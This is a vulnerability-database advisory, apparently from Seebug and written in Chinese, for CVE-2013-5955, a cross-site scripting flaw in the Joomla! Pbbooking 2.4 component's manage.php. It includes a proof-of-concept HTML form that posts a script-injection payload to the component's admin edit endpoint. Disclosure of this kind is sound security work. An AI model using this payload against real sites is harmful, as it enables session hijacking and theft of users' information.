Lucene search
RootSSV:61857HistoryMar 19, 2014 - 12:00 a.m.
Joomla! Pbbooking组件'manage.php'跨站脚本漏洞
2014-03-1900:00:00
Root
www.seebug.org
72
EPSS
0.002
Percentile
58.6%
Bugtraq ID:66257
CVE ID:CVE-2013-5955
Joomla!是一套在国外相当知名的内容管理系统。
Joomla! Pbbooking组件’manage.php’脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞进行跨站脚本攻击,可获取敏感信息或劫持用户会话。
0
Joomla! Pbbooking 2.4
目前没有详细解决方案提供:
http://www.joomla.org/
<form action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit"
method="post">
<input
type="text" name="id" value="1" />
<input
type="text" name="date" value="1" />
<input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
<input
type="submit" name="submit2" value="Submit" />
</form>
Related
cvelist
cvelist
CVE-2013-5955
2014-03-19 14:00:00
nvd
nvd
CVE-2013-5955
2014-03-19 14:17:45
packetstorm
packetstorm
Joomla Pbbooking 2.4 Cross Site Scripting
2014-03-15 00:00:00
prion
prion
Cross site scripting
2014-03-19 14:17:00
cve
cve
CVE-2013-5955
2014-03-19 14:17:45